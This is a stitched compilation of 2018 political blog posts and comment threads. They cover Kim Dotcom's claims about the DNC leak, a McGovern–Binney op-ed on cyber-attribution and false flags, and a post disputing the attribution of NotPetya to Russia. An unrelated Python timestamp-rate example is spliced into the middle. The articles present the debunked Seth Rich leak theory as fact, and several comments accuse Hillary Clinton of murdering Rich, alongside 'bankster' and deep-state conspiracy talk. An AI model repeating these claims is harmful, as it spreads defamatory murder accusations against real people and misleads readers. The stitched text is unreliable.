"... They know exactly who it was with the memory stick, there is always video of one form or another either in the data center or near the premises that can indicate who it was. They either have a video of Seth Rich putting the stick into the server directly, or they at least have a video of his car entering and leaving the vicinity of the ex-filtration. ..."
"... This would have been an open and shut case if shillary was not involved. Since it was involved, you can all chalk it up to the Clinton body count. I pray that it gets justice. It and the country, the world - needs justice. ..."
Feb 19, 2018 | www.zerohedge.com

Kim Dotcom: "Let Me Assure You, The DNC Hack Wasn't Even A Hack"

by Tyler Durden Mon, 02/19/2018 - 07:51

Kim Dotcom has once again chimed in on the DNC hack, following a Sunday morning tweet from President Trump clarifying his previous comments on Russian meddling in the 2016 election.

In response, Dotcom tweeted " Let me assure you, the DNC hack wasn't even a hack. It was an insider with a memory stick. I know this because I know who did it and why," adding "Special Counsel Mueller is not interested in my evidence. My lawyers wrote to him twice. He never replied. 360 pounds! " alluding of course to Trump's "400 pound genius" comment.

Dotcom's assertion is backed up by an analysis done last year by a researcher who goes by the name Forensicator , who determined that the DNC files were copied at 22.6 MB/s - a speed virtually impossible to achieve from halfway around the world, much less over a local network - yet a speed typical of file transfers to a memory stick.

The local transfer theory of course blows the Russian hacking narrative out of the water, lending credibility to the theory that the DNC "hack" was in fact an inside job, potentially implicating late DNC IT staffer, Seth Rich.

John Podesta's email was allegedly successfully "hacked" (he fell victim to a phishing scam) in March 2016, while the DNC reported suspicious activity (the suspected Seth Rich file transfer) in late April, 2016 according to the Washington Post.

On May 18, 2017, Dotcom proposed that if Congress includes the Seth Rich investigation in their Russia probe, he would provide written testimony with evidence that Seth Rich was WikiLeaks' source.

On May 19 2017 Dotcom tweeted "I knew Seth Rich. I was involved"

Three days later, Dotcom again released a guarded statement saying "I KNOW THAT SETH RICH WAS INVOLVED IN THE DNC LEAK," adding:

"I have consulted with my lawyers. I accept that my full statement should be provided to the authorities and I am prepared to do that so that there can be a full investigation. My lawyers will speak with the authorities regarding the proper process.

If my evidence is required to be given in the United States I would be prepared to do so if appropriate arrangements are made. I would need a guarantee from Special Counsel Mueller, on behalf of the United States, of safe passage from New Zealand to the United States and back. In the coming days we will be communicating with the appropriate authorities to make the necessary arrangements. In the meantime, I will make no further comment."

Dotcom knew.

While one could simply write off Dotcom's claims as an attention seeking stunt, he made several comments and a series of tweets hinting at the upcoming email releases prior to both the WikiLeaks dumps as well as the publication of the hacked DNC emails to a website known as "DCLeaks."

In a May 14, 2015 Bloomberg article entitled "Kim Dotcom: Julian Assange Will Be Hillary Clinton's Worst Nightmare In 2016 ": "I have to say it's probably more Julian," who threatens Hillary, Dotcom said. " But I'm aware of some of the things that are going to be roadblocks for her ."

Two days later, Dotcom tweeted this:

Around two months later, Kim asks a provocative question

Two weeks after that, Dotcom then tweeted "Mishandling classified info is a crime. When Hillary's emails eventually pop up on the internet who's going to jail?"

It should thus be fairly obvious to anyone that Dotcom was somehow involved, and therefore any evidence he claims to have, should be taken seriously as part of Mueller's investigation. Instead, as Dotcom tweeted, "Special Counsel Mueller is not interested in my evidence. My lawyers wrote to him twice. He never replied. "
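The 22.6 MB/s figure the article attributes to Forensicator is the kind of number one gets by comparing file sizes in an archive with the last-modified times stored in its headers. The block below is an added example, not code from the article, from Forensicator or from Zero Hedge: it derives such a rate from a constructed file listing and attaches the error bars that timestamp truncation imposes. The file names, sizes and times are made up for the demo. Two things matter when reading any such number: an mtime records when the write that produced that copy finished, so the rate describes whichever copy operation last wrote those files, and a 1 s or 2 s timestamp resolution makes a rate measured over a few seconds very uncertain.

```python
from datetime import datetime, timedelta
from typing import Iterable, Tuple

# (name, size in bytes, last-modified time) as read from an archive's file headers
Entry = Tuple[str, int, datetime]


def constructed_listing() -> list:
    """Constructed sample listing; not real data from any archive."""
    t0 = datetime(2018, 1, 1, 12, 0, 0)
    return [
        ("a.pdf",   1_000_000, t0),
        ("b.docx", 20_000_000, t0 + timedelta(seconds=1)),
        ("c.xlsx", 25_000_000, t0 + timedelta(seconds=2)),
        ("d.pst",  45_000_000, t0 + timedelta(seconds=4)),
        ("e.zip",  10_000_000, t0 + timedelta(seconds=5)),
    ]


def implied_rate(entries: Iterable[Entry], resolution_s: float = 1.0) -> dict:
    """Bytes per second implied by the spread of last-modified times.

    An mtime marks the end of a file's write, so the first file's bytes landed
    before the measured window opens and are excluded. Stored mtimes are
    truncated to the filesystem's or archive format's resolution (1 s assumed
    here; FAT and ZIP keep 2 s), so the true elapsed interval may be up to one
    resolution unit longer or shorter than the recorded one.
    """
    ordered = sorted(entries, key=lambda e: e[2])
    if len(ordered) < 2:
        raise ValueError("need at least two files to measure an interval")
    moved = sum(size for _, size, _ in ordered[1:])
    elapsed = (ordered[-1][2] - ordered[0][2]).total_seconds()
    if elapsed <= 0:
        raise ValueError("all files share one timestamp; the rate is unbounded")
    high = moved / (elapsed - resolution_s) if elapsed > resolution_s else float("inf")
    return {
        "bytes": moved,
        "elapsed_s": elapsed,
        "rate_bps": moved / elapsed,
        "rate_low_bps": moved / (elapsed + resolution_s),
        "rate_high_bps": high,
    }


def per_file_rates(entries: Iterable[Entry]) -> dict:
    """Rate each file was written at, judged from the gap since the previous
    mtime; a file sharing a timestamp with its predecessor cannot be rated."""
    ordered = sorted(entries, key=lambda e: e[2])
    rates = {}
    for prev, cur in zip(ordered, ordered[1:]):
        gap = (cur[2] - prev[2]).total_seconds()
        rates[cur[0]] = cur[1] / gap if gap > 0 else None
    return rates


if __name__ == "__main__":
    summary = implied_rate(constructed_listing())
    print("aggregate: %.1f MB/s (range %.1f to %.1f)" % (
        summary["rate_bps"] / 1e6, summary["rate_low_bps"] / 1e6, summary["rate_high_bps"] / 1e6))
    for name, rate in per_file_rates(constructed_listing()).items():
        print(name, "n/a" if rate is None else "%.1f MB/s" % (rate / 1e6))
```

With the constructed listing the aggregate is 20 MB/s, but the 1 s resolution alone widens the plausible range to roughly 16.7 to 25 MB/s, and the largest single file implies 22.5 MB/s over its two-second gap. A rate computed from a few seconds of timestamps is therefore a rough estimate of the last copy step, not a measurement of the path the data originally took.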

chunga Sun, 02/18/2018 - 21:59 Permalink

Pffft...this guy sounds like the reds with their "blockbuster" memo. Honest Hill'rey is laughing!

SethPoor -> chunga Sun, 02/18/2018 - 22:00 Permalink

https://www.youtube.com/watch?v=5_8VaMbPjUU

Bes -> J S Bach Sun, 02/18/2018 - 22:17 Permalink

All fucking Kabuki. All of it.

The Deep State (Oligarchs and the MIC) is totally fucking loving this: they have Trump and the GOP giving them everything they ever wanted and they have the optics and distraction of an "embattled" president that claims to be against or a victim of the "deep state" and a base that rallies, circles the wagons around him, and falls for the narrative.

Meanwhile they keep enacting the most Pro Deep State/MIC/Police State/Zionist/Wall Street agenda possible. And they call it #winning

----

pathetic.

bigkahuna -> CheapBastard Mon, 02/19/2018 - 09:58 Permalink

"Had to be a Russian mole with a computer stick. MSM, DNC and Muller say so."

They know exactly who it was with the memory stick, there is always video of one form or another either in the data center or near the premises that can indicate who it was. They either have a video of Seth Rich putting the stick into the server directly, or they at least have a video of his car entering and leaving the vicinity of the exfiltration.

This would have been an open and shut case if shillary was not involved. Since it was involved, you can all chalk it up to the Clinton body count. I pray that it gets justice. It and the country, the world - needs justice.

StarGate -> CheapBastard Mon, 02/19/2018 - 11:23 Permalink

Don't forget the "hack" analysis of Russian owned "Crowdstrike" since the FBI did and continues to, refuse to analyze the DNC computers.

KuriousKat -> CheapBastard Mon, 02/19/2018 - 13:26 Permalink

Isn't Alperovitch the Only Russian in there?.. When you rule out the impossible...whatever remains probable.. probably is..

wildbad -> IntercoursetheEU Mon, 02/19/2018 - 03:05 Permalink

Kim is great, Assange is great. Kim is playing a double game. He wants immunity from the US GUmmint overreach that destroyed his company and made him a prisoner in NZ.

Good on ya Kim.

His name was Seth Rich...and he will reach out from the grave and bury Killary who murdered him.

NumberNone -> wildbad Mon, 02/19/2018 - 10:04 Permalink

There are so many nuances to this and all are getting mentioned but the one that also stands out is that in an age of demands for gun control by the Dems, Seth Rich is never, ever mentioned. He should be the poster child for gun control. Young man, draped in an American flag, helping democracy, gunned down...it writes itself.

They either are afraid of the possible racial issues should it turn out to be a black man killing a white man (but why should that matter in a gun control debate?) or they just don't want people looking at this case. I go for #2.

Socratic Dog -> Buckaroo Banzai Mon, 02/19/2018 - 12:09 Permalink

Funny that George Webb can figure it out, but Trump, Leader of the Free World, is sitting there with his dick in his hand waiting for someone to save him.

Whatever he might turn out to be, this much is clear: Trump is a spineless weakling. He might be able to fuck starlets, but he hasn't got the balls to defend either himself or the Republic.

verumcuibono -> Buckaroo Banzai Mon, 02/19/2018 - 14:26 Permalink

Webb's research is also...managed. But a lot of it was/is really good (don't follow it anymore) and I agree re: SR piece of it.

I think SR is such an interesting case. It's not really an anomaly because SO many Bush-CFR-related hits end the same way and his had typical signatures. But his also squeals of a job done w/out much prior planning because I think SR surprised everyone. If, in fact, that was when he was killed. Everything regarding the family's demeanor suggests no.

verumcuibono -> NumberNone Mon, 02/19/2018 - 12:41 Permalink

MANY patterns in shootings: failure in law enforcement/intelligence who were notified of problem individuals ahead of time, ARs, mental health and SSRIs, and ongoing resistance to gun control in DC ----these are NOT coincidences. Nor are distractions in MSM's version of events w/ controlled propaganda.

Children will stop being killed when America wakes the fuck up and starts asking the right questions, making the right demands. It's time.

KJWqonfo7 -> wildbad Mon, 02/19/2018 - 11:15 Permalink

Kim is awesome to watch, I remember his old website of pics of him on yachts with hot girls and racing the Gumball Rally.

verumcuibono -> wildbad Mon, 02/19/2018 - 14:28 Permalink

I don't think you know how these hackers have nearly ALL been intercepted by CIA--for decades now. DS has had backdoor access to just about all of them. I agree that Kim is great, brilliant and was sabotaged but he's also cooperating. Otherwise he'd be dead.

StarGate -> Billy the Poet Mon, 02/19/2018 - 11:48 Permalink

Bes is either "disinfo plant" or energy draining pessimist. Result is the same - to deflate your power to create a new future.

Trump saw the goal of the Fed Reserve banksters decades ago and spoke often about it. Like Prez Kennedy he wants to return USA economy to silver or gold backed dollar then transition to new system away from the Black Magic fed reserve/ tax natl debt machine.

The Globalist Cabal has been working to destroy the US economy ever since they income tax April 15th Lincoln at the Ford theater. 125 years. But Bes claims because Trump cannot reverse 125 years of history in one year that it is kabuki.

Pessimism is its own reward.

[Feb 18, 2018] Both agencies were complicit in the most infamous assassinations and false flag episodes since the Kennedy/MLK Vietnam days. Don't forget Air America CIA drug running and Iran/Contra / October Surprise affairs.

Notable quotes:
"... The Dulles brothers, with Allan as head of Sullivan and Cromwells' CIA were notorious facilitators for the international banksters and their subsidiary corporations which comprise the largest oil and military entities which have literally plainly stated in writing, need to occasionally "GALVANIZE" the American public through catastrophic and catalyzing events in order for Americans to be terrified into funding and fighting for those interlocked corporations in their quest to spread "FULL SPECTRUM DOMINANCE," throughout the globe. ..."
"... The book by Peter Dale Scott, "The American Deep State Wall Street, Big Oil And the Attack on American Democracy" covers in detail some of the points you mention in your reply. It is a fascinating book. ..."
Feb 18, 2018 | consortiumnews.com

Lee Anderson , February 17, 2018 at 4:32 pm

Your link to the Giraldi piece is appreciated, however, Giraldi starts off on a false premise: He claims that people generally liked and trusted the FBI and CIA up until or shortly after 9/11. Not so! Both agencies were complicit in the most infamous assassinations and false flag episodes since the Kennedy/MLK Vietnam days. Don't forget Air America CIA drug running and Iran/Contra / October Surprise affairs.

The Dulles brothers, with Allan as head of Sullivan and Cromwells' CIA were notorious facilitators for the international banksters and their subsidiary corporations which comprise the largest oil and military entities which have literally plainly stated in writing, need to occasionally "GALVANIZE" the American public through catastrophic and catalyzing events in order for Americans to be terrified into funding and fighting for those interlocked corporations in their quest to spread "FULL SPECTRUM DOMINANCE," throughout the globe.

The political parties are theatre designed to fool the people into believing we are living in some sort of legitimate, representative system, when it's the same old plutocracy that manages to get elected because they've long figured out the art of polarizing people and capitalising on tribal alignments.

We should eliminate all government for a time so that people can begin to see that corporations really do and most always have run the country.

It's preposterous to think the stupid public is actually discussing saddling ourselves and future generations with gargantuan debt through a system designed and run by banksters!

It should be self-evident that a sovereign nation should maintain and forever hold the rights to develop a monetary/financial system that serves the needs of the people, not be indentured servants in a financial system that serves the insatiable greed of a handful of parasitic banksters and corporate tycoons!

Joe Tedesky , February 17, 2018 at 5:08 pm

You are so right, in fact Robert Parry made quite a journalistic career out of exposing the CIA for such things as drug running. I gave up on that agency a long time ago, after JFK was murdered, and I was only 13 then. Yeah maybe Phil discounts the time while he worked for the CIA, but the CIA has many, many rooms in which plots are hatched, so the valiant truth teller Giraldi may be excused this one time for his lack of memory, I guess, right?

Good comment Lee. Joe

Annie , February 17, 2018 at 5:56 pm

Yes, but he's referring to the public's opinion of these agencies, and if they didn't continue to retain, even after 9/11, a significant popularity in the public's mind how would we have so many Americans buying into Russia-gate? In my perception of things they only lost some ground after 9/11, but Americans notoriously have a short memory span.

Gregory Herr , February 17, 2018 at 6:42 pm

And films that are supposed to help Americans feel good about the aims and efficacy of the agencies like Zero Dark Thirty and Argo are in the popular imagination.

Skeptigal , February 17, 2018 at 7:19 pm

The book by Peter Dale Scott, "The American Deep State Wall Street, Big Oil And the Attack on American Democracy" covers in detail some of the points you mention in your reply. It is a fascinating book.

[Feb 16, 2018] Russians Spooked by Nukes-Against-Cyber-Attack Policy Consortiumnews

Feb 16, 2018 | consortiumnews.com

Russians Spooked by Nukes-Against-Cyber-Attack Policy February 16, 2018

New U.S. policy on nuclear retaliatory strikes for cyber-attacks is raising concerns, with Russia claiming that it's already been blamed for a false-flag cyber-attack – namely the election hacking allegations of 2016, explain Ray McGovern and William Binney.

By Ray McGovern and William Binney

Moscow is showing understandable concern over the lowering of the threshold for employing nuclear weapons to include retaliation for cyber-attacks, a change announced on Feb. 2 in the U.S. Nuclear Posture Review (NPR).

A nuclear test detonation carried out in Nevada on April 18, 1953.

Explaining the shift in U.S. doctrine on first-use, the NPR cites the efforts of potential adversaries "to design and use cyber weapons" and explains the change as a "hedge" against non-nuclear threats. In response, Russia described the move as an "attempt to shift onto others one's own responsibility" for the deteriorating security situation.

Moscow's concern goes beyond rhetoric. Cyber-attacks are notoriously difficult to trace to the actual perpetrator and can be pinned easily on others in what we call "false-flag" operations. These can be highly destabilizing – not only in the strategic context, but in the political arena as well.

Russian President Vladimir Putin has good reason to believe he has been the target of a false-flag attack of the political genre. We judged this to be the case a year and a half ago, and said so. Our judgment was fortified last summer – thanks to forensic evidence challenging accusations that the Russians hacked into the Democratic National Committee and provided emails to WikiLeaks. (Curiously, the FBI declined to do forensics, even though the "Russian hack" was being described as an "act of war.")

Our conclusions were based on work conducted over several months by highly experienced technical specialists, including another former NSA technical director (besides co-author Binney) and experts from outside the circle of intelligence analysts.

On August 9, 2017, investigative reporter Patrick Lawrence summed up our findings in The Nation. "They have all argued that the hack theory is wrong and that a locally executed leak is the far more likely explanation," he explained.

As we wrote in an open letter to Barack Obama dated January 17, three days before he left office, the NSA's programs are fully capable of capturing all electronic transfers of data. "We strongly suggest that you ask NSA for any evidence it may have indicating that the results of Russian hacking were given to WikiLeaks," our letter said. "If NSA cannot produce such evidence – and quickly – this would probably mean it does not have any."

A 'Dot' Pointing to a False Flag?

In his article, Lawrence included mention of one key, previously unknown "dot" revealed by WikiLeaks on March 31, 2017. When connected with other dots, it puts a huge dent in the dominant narrative about Russian hacking. Small wonder that the mainstream media immediately applied white-out to the offending dot.

Lawrence, however, let the dot out of the bag, so to speak: "The list of the CIA's cyber-tools WikiLeaks began to release in March and labeled Vault 7 includes one called Marble Framework that is capable of obfuscating the origin of documents in false-flag operations and leaving markings that point to whatever the CIA wants to point to."

If congressional oversight committees summon the courage to look into "Obfus-Gate" and Marble, they are likely to find this line of inquiry as lucrative as the Steele "dossier." In fact, they are likely to find the same dramatis personae playing leading roles in both productions.

Two Surprising Visits

Last October CIA Director Mike Pompeo invited one of us (Binney) into his office to discuss Russian hacking. Binney told Pompeo his analysts had lied and that he could prove it.

In retrospect, the Pompeo-Binney meeting appears to have been a shot across the bow of those cyber warriors in the CIA, FBI, and NSA with the means and incentive to adduce "just discovered" evidence of Russian hacking. That Pompeo could promptly invite Binney back to evaluate any such "evidence" would be seen as a strong deterrent to that kind of operation.

Pompeo's closeness to President Donald Trump is probably why the heads of Russia's three top intelligence agencies paid Pompeo an unprecedented visit in late January. We think it likely that the proximate cause was the strategic danger Moscow sees in the nuclear-hedge-against-cyber-attack provision of the Nuclear Posture Statement (a draft of which had been leaked a few weeks before).

If so, the discussion presumably focused on enhancing hot-line and other fail-safe arrangements to reduce the possibility of false-flag attacks in the strategic arena – by anyone – given the extremely high stakes.

Putin may have told his intelligence chiefs to pick up on President Donald Trump's suggestion, after the two met last July, to establish a U.S.-Russian cyber security unit. That proposal was widely ridiculed at the time. It may make good sense now.

Ray McGovern, a CIA analyst for 27 years, was chief of the Soviet Foreign Policy Branch and briefed the President's Daily Brief one-on-one from 1981-1985. William Binney worked for NSA for 36 years, retiring in 2001 as the technical director of world military and geopolitical analysis and reporting; he created many of the collection systems still used by NSA.


mike k , February 16, 2018 at 5:36 pm

Those Russians had a strange mission coming to CIA headquarters to try to negotiate with soulless mass murderers in the name of maintaining a precarious semblance of peace, knowing full well that these men's words and assurances were worth less than nothing. Ah well, I guess in a mad situation one is reduced to making desperate gestures, hoping against hope.

Mild-ly -Facetious , February 16, 2018 at 5:42 pm

FYI: Putin prefers Aramco to Trump's sword dance

Hardly 10 months after honoring the visiting US president, the Saudis are open to a Russian-Chinese consortium investing in the upcoming Aramco IPO

By M.K. BHADRAKUMAR
FEBRUARY 16, 2018

[extract]

In the slideshow that is Middle Eastern politics, the series of still images seldom add up to make an enduring narrative. And the probability is high that when an indelible image appears, it might go unnoticed – such as Russia and Saudi Arabia wrapping up huge energy deals on Wednesday underscoring a new narrative in regional and international security.

The ebb and flow of events in Syria – Turkey's campaign in Afrin and its threat to administer an "Ottoman slap" to the United States, and the shooting down of an Israeli F-16 jet – hogged the attention. But something of far greater importance was unfolding in Riyadh, as Saudi and Russian officials met to seal major deals marking a historic challenge to the US dominance in the Persian Gulf region.

The big news is the Russian offer to the Saudi authorities to invest directly in the upcoming Aramco initial public offering – and the Saudis acknowledging the offer. Even bigger news, surely, is that Moscow is putting together a Russian-Chinese consortium of joint investment funds plus several major Russian banks to be part of the Aramco IPO.

Chinese state oil companies were interested in becoming cornerstone investors in the IPO, but the participation of a Russia-China joint investment fund takes matters to an entirely different realm. Clearly, the Chinese side is willing to hand over tens of billions of dollars.

Yet the Aramco IPO was a prime motive for US President Donald Trump to choose Saudi Arabia for his first foreign trip. The Saudi hosts extended the ultimate honor to Trump – a ceremonial sword dance outside the Murabba Palace in Riyadh. Hardly 10 months later, they are open to a Russian-Chinese consortium investing in the Aramco IPO.

Riyadh plans to sell 5% of Saudi Aramco in what is billed as the largest IPO in world history. In the Saudi estimation, Aramco is worth US$2 trillion; a 5% stake sale could fetch as much as $100 billion. The IPO is a crucial segment of Vision 2030, Saudi Crown Prince Mohammad bin Salman's ambitious plan to diversify the kingdom's economy.

MORE : http://www.atimes.com/article/putin-prefers-aramco-trumps-sword-dance/

Anna , February 16, 2018 at 6:46 pm

"Last October CIA Director Mike Pompeo invited one of us (Binney) into his office to discuss Russian hacking. Binney told Pompeo his analysts had lied and that he could prove it."

That was about some Dm. Alperovitch of CrowdStrike fame, who had discovered the "hacking" in 10 sec. Guess Alperovitch, as an "expert" at the viciously Russophobic Atlantic Council (funded by the State Dept., NATO, and a set of unsavory characters like Ukrainian oligarch Pinchuk) decided to show his "understanding" of the task. The shy FBI did not even attempt to look at Clinton's server because the bosses "knew better."

Alperovitch must be investigated for anti-American activities; the scoundrel has been sowing discord into the US society with his lies while endangering the US citizenry.

[Feb 16, 2018] White House: Iraq Has Anthrax Virus Russia Launched NotPetya

Feb 16, 2018 | www.moonofalabama.org

Late last night the White House accused the Russian military of having launched the destructive "NotPetya" malware which in June 2017 hit many global companies:

Statement from the Press Secretary

In June 2017, the Russian military launched the most destructive and costly cyber-attack in history.

The attack, dubbed "NotPetya," quickly spread worldwide, causing billions of dollars in damage across Europe, Asia, and the Americas. It was part of the Kremlin's ongoing effort to destabilize Ukraine and demonstrates ever more clearly Russia's involvement in the ongoing conflict. This was also a reckless and indiscriminate cyber-attack that will be met with international consequences.

The statement has the same quality as earlier statements about Spain sinking the Maine or about Saddam's Weapons of Mass Destruction.

Neither the U.S. nor anyone else has presented ANY evidence of ANY Russian involvement in the creation or distribution of the NotPetya malware. The U.S. is simply asserting this while presenting nothing to back it up.

There is, in general, no attribution possible for any such cyber attack. As John McAfee, founder of an anti-virus firm, said:

"When the FBI or when any other agency says the Russians did it or the Chinese did something or the Iranians did something – that's a fallacy," said McAfee.
...
"Any hacker capable of breaking into something is extraordinarily capable of hiding their tracks. If I were the Chinese and I wanted to make it look like the Russians did it I would use Russian language within the code. "I would use Russian techniques of breaking into organisations so there is simply no way to assign a source for any attack – this is a fallacy."
...
I can promise you – if it looks like the Russians did it, then I can guarantee you it was not the Russians."

I agree with McAfee's statement. The CIA must likewise agree. Wikileaks has released a number of CIA cyber tools it had obtained. These included software specifically designed to create false attributions:

The CIA's Remote Devices Branch's UMBRAGE group collects and maintains a substantial library of attack techniques 'stolen' from malware produced in other states including the Russian Federation.

With UMBRAGE and related projects the CIA cannot only increase its total number of attack types but also misdirect attribution by leaving behind the "fingerprints" of the groups that the attack techniques were stolen from.

Nearly all "attributes" used for attributing a cyber attack can be easily faked to accuse a party not involved in the attack.

The British National Cyber Security Center, part of the British computer spying organisation GCHQ, also claims that the Russian military is "almost certainly" responsible for the NotPetya attack. Canada and the Australians also chipped in.

But note - these are NOT independent sources. They are, together with New Zealand, part of the "Five Eyes" spying alliance. From NSA files released by Edward Snowden we know that the Five Eyes are practically led by the U.S. National Security Agency:

One internal document quotes the head of the NSA, Lieutenant General Keith Alexander, on a visit to Menwith Hill in June 2008, asking: "Why can't we collect all the signals all the time? Sounds like a good summer project for Menwith."

Menwith Hill is a Royal Air Force spying station and part of the GCHQ infrastructure. That the head of the NSA can assign "summer projects" to it shows where the real power lies.

The Russian government strongly rejects the accusations.

NotPetya was a destructive virus that masked as ransomware. It was based on attacking tools which originally had been developed by the NSA but were later anonymously published by someone calling himself Shadow-Broker. One of several attack vectors NotPetya used was the update mechanism of some tax accounting software which is common in Ukraine and Russia. But the attack soon spread globally:

The attack hit Ukraine central bank, government computers, airports, the Kiev metro, the state power distributor Ukrenergo, Chernobyl's radiation monitoring system, and other machines in the country. It also affected Russian oil giant Rosneft, DLA Piper law firm, U.S. biopharmaceutical giant Merck, British advertiser WPP, and Danish shipping and energy company Maersk, among others.

The biggest damage through NotPetya occurred at the Danish shipping company Maersk which had to completely reboot its entire infrastructure and lost some $250-300 million due to the attack.

The question one must always ask when such accusations are made is: Why would the accused do this?

In January the U.S. attribution claims about the NotPetya malware were prelaunched through the Washington Post:

The CIA has attributed to Russian military hackers a cyberattack that crippled computers in Ukraine last year, an effort to disrupt that country's financial system amid its ongoing war with separatists loyal to the Kremlin.
...
The GRU military spy agency created NotPetya, the CIA concluded with "high confidence" in November, according to classified reports cited by U.S. intelligence officials.
...
The hackers worked for the military spy service's GTsST, or Main Center for Special Technology, the CIA reported. That unit is highly involved in the GRU's cyberattack program, including the enabling of influence operations.

What could have been the motive of the "Russian military" to release a (badly written) malware that destroys computer-files of random companies all over the world including at the all important Russian oil-giant Rosneft? To assume that Ukraine's financial system was the target is almost certainly wrong. There is also no evidence that this was the case. Ukraine's Central Bank was just one of thousands of victims of the attack.

Only some 50% of the affected companies were in Ukraine. Most of them were not financial firms. The attack was initiated through an update mechanism of an accounting software that is also used in Russia. That original attack vector was probably chosen simply because it was easy to use. The accounting software company had a lousy security protection. The first infected computers then applied a different mechanism to spread the malware to other machines. The attack was launched on a Ukrainian national holiday which is not optimal if one wants to spread it as wide as possible throughout the Ukraine.

That the Ukraine and Russia were hit first by the malware was also likely just a time-of-day question. The timeline shows that the U.S. and most of western-Europe were still asleep when the virus started to proliferate. The anti-virus organizations, the Russian company Kaspersky among them, took only a few hours to diagnose the attacking software. A solution to prevent further damage was found within some twelve hours. By the time the U.S. working day started anti-virus companies were already releasing advice and protective code against it. If the attack had not been stopped by protective software it would have affected many more computers. Most of these would not have been in the Ukraine.

The U.S. attribution of the NotPetya attack to some Russian organization is extremely doubtful. In general a certain attribution of any such cyber attack is impossible. It is easy for any sophisticated virus writer to modify the code so that it looks as if it was written by some third party. The CIA even develops tools to do exactly that.

The attacking software seemed to be of relatively low quality. It was a badly designed mishmash created from earlier known malware and spy tools. It was not confined to a certain country or target. It can at best be described as an act of random vandalism on a global scale. There is no discernible motive for any Russian state organizations to release such nonsense.

In 2009 Russia offered an international treaty to prohibit cyber attacks. It was the U.S. under Obama which rejected it as "unnecessary" while it was expanding its own attack capabilities.

The U.S. government has launched a Cold War 2.0 against Russia. The motive for that seems to be mostly monetary. Hunting a few 'terrorists' does not justify big military budgets, opposing a nuclear power does.

The now released accusations against Russia have as much foundation in reality as the claims of alleged Iraqi WMDs. We can only hope that these new accusations will have less severe consequences.

Posted by b on February 16, 2018 at 04:30 AM | Permalink

Comments


uncle tungsten , Feb 16, 2018 4:53:27 AM | 1

Trump has made a fool of himself by agreeing to be the mouth for some looney security briefing. Why is the White House releasing this? Why not the NSA or some slightly distant body so the president can be kept clear of blowback if the accusation is proven to be wrong (as it has been and was at the time of its spread). A gullible fool is spouting at the behest of the five anuses. They certainly aren't eyes with that sh!t coming out.
igybundy , Feb 16, 2018 5:44:44 AM | 2
Some of the smartest hackers I seen are Russians, although a lot of kids will just do it for kicks, professionals would have a target rather than random targets that can back fire aka how the US does things as we seen off their Iranian attack.

Kaspersky being the best of the best, the Kremlin would know and would make great effort to make sure they stay as far away from them as possible, to give it a fighting chance. That Kaspersky found it so fast shows it was not Russian, since you want them to be last on the list to know about it. Kaspersky for some strange reason also works with their partners in the US/UK etc., sharing information. So Russians themselves would work to defeat a Russian attack even if it's made. Which any smart cookie would say is self-defeating, and they would not waste the effort to try.


Jen , Feb 16, 2018 5:55:09 AM | 3
Could the attack have been co-ordinated by parties in different countries but in the same time zone or in neighbouring time zones, with one or two of these being the same time zones that European Russia is in?

It seems possible that at least one of these parties might be based in Ukraine. For Ukrainian-based pro-Maidan cyber-hackers to release the virus on a Ukrainian public holiday, when most major public and private institutions and businesses are closed, but Russian ones are not, would make sense. Another party could be based in a different country with sophisticated cyber-technology and experience in creating and spreading cyber-viruses that is in the same time zone as Ukraine. Israel comes to mind.

Ian , Feb 16, 2018 6:11:01 AM | 4
I don't believe anything will come of it. I see these accusations as petty attempts to get under Russia's skin. Frankly, I can't see anybody believing the crap that comes out of Washington's mouth, especially after what Snowden/Wikileaks has revealed to the public.
Me , Feb 16, 2018 6:30:32 AM | 5
These Russians are so badass!
I'm beginning to wish to be a Russian. :)
Partisan , Feb 16, 2018 6:35:18 AM | 6
"Some of the smartest hackers I seen are Russians, ....."

I am curious where have you seen them?

Second thing which I've never understood about hacking is, why all this noise about it. It is like PC and network infrastructures are the holy grail and untouchable. The fetishization of this particular technology which comes from the West is unbearable; it is like the life on earth depends on it. That cannot be further from the truth. The US behaves as the owner and guardian of the IT sector, and they have handsomely profited from it.

If someone leaves their nodes exposed on the Internet then it is their fault; why not hack it. To hell with them. If someone leaves sensitive documents on a server then again that's the owner's problem, and so on. It is not a bigger crime than "regular" spying activity.

The Russian hacking is beside the point. Two big powers, capitalist countries with almost identical political structure, are competing in the world arena. One of them is in decline big time, the second one resurgent but stagnant in development and in gaining wider influence. The USA is clearly unable to bribe Russia (as it used to), although countries such as North Korea still suffer from their collusion in the Security Council.

Hacking someone's IT infrastructure is a mature skill and there is nothing new in it, so just like everything else, everything the US and its organs are saying is a plain lie. Now, the problem is that after a lie follows some kind of coercion. If that doesn't work - if you are a small and defenseless country - then they will kill you.

Red Ryder , Feb 16, 2018 6:49:23 AM | 7
There are at least two tactics in cyberwarfare (which this is).
First, to attack and destroy infrastructure of an enemy or opponent or resistant vassal.
Second, to place blame on others for the use of cyber as a weapon.

The US is at cyber war with Russia and China. This is not Cold War.
Neither was Stuxnet. That was cyber war on Iran. It got out beyond Iran because its careless design sought Siemens equipment everywhere on the Internet. It went to many other countries far beyond Iran and attacked the equipment there.

This malware was not well-designed either. It may have been meant for Russian targets. Rosneft is a huge economic target.

But this campaign using NotPetya had the value of being a Tactic #1 attack + #2 failure against Russia. The CIA got to blame Russia even though the intended damage was quickly reversed by Kaspersky. The irony is they attacked a nation with the best resources to combat and defend against the weapon they used.

But make no mistake, the CyberWars are well underway. The US is sloppy, just like all their Hegemon efforts are seriously flawed in classic terms of execution. The Russians are far more elegant with cyber, as anyone who knows their software experts or products over the years.

Partisan , Feb 16, 2018 7:01:48 AM | 8
"But make no mistake, the CyberWars are well underway."

I doubt, I doubt very much. If there is one, then it is manufactured.

No vital and nationally sensitive or strategic IT nodes are exposed to the public net. All this is a bizarre narrative created by the Deep State for idiots. Probably ~60% of drug-infested Amerikkans do not care. The rest: https://medium.com/incerto/the-intellectual-yet-idiot-13211e2d0577 are somewhat interested. We can argue whether for domestic (in the light of another shooting, if true) or international purposes (Syria, Iraq, Iran), or both.

Partisan , Feb 16, 2018 7:14:33 AM | 9
The Class War is Marx's term that is taboo and forbidden in the capitalist world everywhere and in particular in the US, where social oppression and inequality are the greatest in the world by far.

Maintaining all kinds of spin and propaganda along with political oppression, i.e. the help of the political police, the American version of the Nazis' Gestapo, is crucial for the ruling class and regime.

While the looting of the drugged and non-drugged Americans continues unabated.

Partisan , Feb 16, 2018 7:33:59 AM | 10
I would say that only 10% of the Amerikkans have a clue what hacking is about, and a very small percentage understand it in technical terms and details. Sadly, it is NOT important and, even more important, those questions should not be asked! Questioning the highest authority is a no-no. The more convoluted the better.

